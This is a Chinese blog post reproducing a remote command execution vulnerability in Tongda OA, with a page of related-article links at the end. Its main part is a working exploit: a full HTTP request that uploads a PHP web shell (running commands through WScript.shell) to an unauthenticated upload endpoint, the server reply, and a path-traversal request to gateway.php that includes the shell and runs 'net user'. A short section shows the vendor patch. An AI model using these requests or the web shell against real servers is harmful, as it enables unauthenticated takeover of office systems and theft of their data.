通达oa 不允许从该ip登陆_通达OA-命令执行漏洞复现
通达OA-命令执行
一、环境
安装文件:
链接:https://pan.baidu.com/s/1Y78Zs-7Igi4MRE0J_Dp-dQ 提取码:2b3i
二、漏洞验证
任意文件上传漏洞 /ispirit/im/upload.php
本地文件包含漏洞 /ispirit/interface/gateway.php
这两个路径不需要登录认证。
burp抓包修改数据包上传文件
POST /ispirit/im/upload.php HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 658
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5
Cookie: PHPSESSID=123
Connection: close
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"
2
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="P"
123
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"
1
------WebKitFormBoundarypyfBh1YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg
$command=$_POST['cmd'];
$wsh = new COM('WScript.shell');
$exec = $wsh->exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
------WebKitFormBoundarypyfBh1YB4pV8McGB--
上传成功
查看返回数据包
HTTP/1.1200OKServer: nginxDate: Wed, 18 Mar 2020 12:12:58 GMTContent-Type: text/html; charset=gbkConnection: closeVary: Accept-EncodingSet-Cookie: PHPSESSID=123; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheX-Frame-Options: SAMEORIGINContent-Length: 41+OK[vm]143263@2003_1787828218|jpg|0[/vm]
文件包含的filename=2003/1787828218.jpg
继续修改数据包 包含前面的文件名称,并且执行系统命令
POST/mac/gateway.phpHTTP/1.1Host: 127.0.0.1:8080Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0Content-Length: 74Content-Type: application/x-www-form-urlencodedjson={"url":"/general/../../attach/im/2003/1787828218.jpg"}&cmd=net user
命令执行成功
上面验证方式是通过burp抓包验证成功
下面通过python脚本验证:
成功命令执行
三、修复代码
补丁修复 /ispirit/im/upload.php
原文件代码:
set_time_limit(0);
$P = $_POST['P'];
if (isset($P) || $P != '') {
ob_start();
include_once 'inc/session.php';
session_id($P);
session_start();
session_write_close();
} else {
include_once './auth.php';
}
修改后代码
删掉了else判断,直接包含/auth.php
//lp 2012/11/29 1:26:01 兼容客户端提交数据时无session的情况
if(isset($P) || $P!="")
{
ob_start();
include_once("inc/session.php");
session_id($P);
session_start();
session_write_close();
}
include_once("./auth.php");
auth.php
这里就直接判断用的是否登录
include_once 'inc/session.php';
session_start();
session_write_close();
include_once 'inc/conn.php';
include_once 'inc/utility.php';
ob_start();
if (!isset($_SESSION['LOGIN_USER_ID']) || $_SESSION['LOGIN_USER_ID'] == '' || !isset($_SESSION['LOGIN_UID']) || $_SESSION['LOGIN_UID'] == '') {
sleep(1);
if (!isset($_SESSION['LOGIN_USER_ID']) || $_SESSION['LOGIN_USER_ID'] == '' || !isset($_SESSION['LOGIN_UID']) || $_SESSION['LOGIN_UID'] == '') {
echo '-ERR ' . _('用户未登陆');
exit;
}
}
四、参考文档
https://github.com/jas502n/OA-tongda-RCE
https://www.cnblogs.com/potatsoSec/p/12516234.html
公众号:
thelostworld:
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
通达oa 不允许从该ip登陆_通达OA-命令执行漏洞复现相关推荐
- 通达OA v11.9 getdata任意命令执行漏洞复现+利用
1.产品简介 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台.包括流程审批.行政办 ...
- 通达OA v11.3 以下版本 任意文件上传加文件包含导致命令执行漏洞在线实验环境
转载自: [通达OA <= v11.3 任意文件上传+文件包含导致命令执行漏洞利用]- https://store.vsplate.com/cn/post/519/ 在线环境地址:https:/ ...
- 泛微OA系统多版本存在命令执行漏洞
0x01漏洞描述 泛微OA办公系统是一款协调办公软件. 泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限. 0x02漏洞危害 攻击者可以通过精心构造的请求包在受影响版本的泛微OA ...
- phpwind index.php?m=designc=api,phpwind v9存在命令执行漏洞(登陆后台)
已知漏洞:https://www.seebug.org/vuldb/ssvid-94465 phpwind v9最新版存在命令执行漏洞(登陆后台) Phpwind_v9.0.2(最新版),phpwin ...
- 通达OA文件上传+文件包含导致远程代码执行漏洞复现
漏洞说明 通达OA是一套办公系统.近日通达OA官方在其官方论坛披露了近期一起通达OA用户服务器遭受勒索病毒攻击事件并发布了多个版本的漏洞补丁.漏洞类型为任意文件上传,受影响的版本存在文件包含漏洞. 未 ...
- 通达oa mysql 登陆_通达oa 怎么进入mysql?
qq_笑_17 在使用通达OA系统时很多用户需要借助Mysql网页式管理工具进入后台数据库去查看数据,进行一些相应的操作.但是大多数时候用户安装完该工具后都是直接进入后台数据库,这样是很不安全.那如何 ...
- 通达信波段王指标公式主图_通达信指标公式源码超赢天下主图源码
做价值的传播者,一路同行,一起成长 问题:怎样才能每天都收到这类文章! 答案:只需点击上方<通达信公式指标> MA5:MA(CLOSE,5); MA10:MA(CLOSE,10); MA2 ...
- 通达信波段王指标公式主图_通达信波段线主图指标公式
通达信波段线主图指标公式: N:=20;N1:=7;N2:=79; MA7:MA(C,7),COLORMAGENTA,LINETHICK2; MA89:MA(C,89),COLORBLUE,LINET ...
- 通达信手机版指标源码大全_通达信指标公式源码短炒买卖指标
做价值的传播者,一路同行,一起成长 问题:怎样才能每天都收到这类文章! 答案:只需点击上方<通达信指标公式软件> VAR1:=((CLOSE-MA(CLOSE,6))/MA(CLOSE,6 ...
最新文章
- 用事件标志组实现多事件的单向同步
- kwvcprojparser不是内部_在盗版window xp上安装的visual studio 2010学习版编译ace6.1时出现如下问题...
- 【ABAP】文本表查找
- 【Python】编程笔记4
- 二叉树节点数据结构-练习 5 二叉树的建立 遍历
- 带有Jersey和Spring的RESTful Web应用程序
- 破坏计算机信息系统功能罪,破坏计算机信息系统罪
- rsync同步工具学习笔记
- 快速开发框架工作笔记002---项目开发中整理_整合好的_Netty高并发处理快速开发框架_Netty快速开发框架
- 配置Spring的用于解决懒加载问题的过滤器
- viewport原理和使用和设置移动端自适应的方法(移动适应电脑)
- 腾讯服务器每秒有2W个QQ号同时上线,找出5min内重新登入的qq号并打印出来。
- ior - POSIX文件系统测试工具
- unity3d 700种 材质球_活动策划:这10种气球创意玩法,让活动现场的布置更高级。...
- [隐写术] J_UNIWARD介绍
- 女生可以做软件测试吗?
- 维特智能六轴姿态传感器JY61P_stm32f1xx驱动代码解析
- lua与c#交互篇 | 合理用好lua+unity,更省性能的方案整理
- 量子计算 18 量子算法3 (RSA Shor)
- 机构推荐24只中线成长股
热门文章
- h5 server send event(sse)
- 1017 A除以B (20分)
- (JAVA)IO缓冲区
- 指令 出厂_口碑营销_南澳出口木箱出厂价
- js里的面向对象分析-(创建实例化对象)
- c语言编写单片机技巧
- 素数倒数的级数发散性的一个证明
- TCL 中upvar 用法 (摘自http://www.cnblogs.com/kane1990/archive/2011/12/19/2293981.html)
- Jquery Money 验证,转换成千分位
- N元语法模型的数据稀疏问题解决方法之一:Good-Turing平滑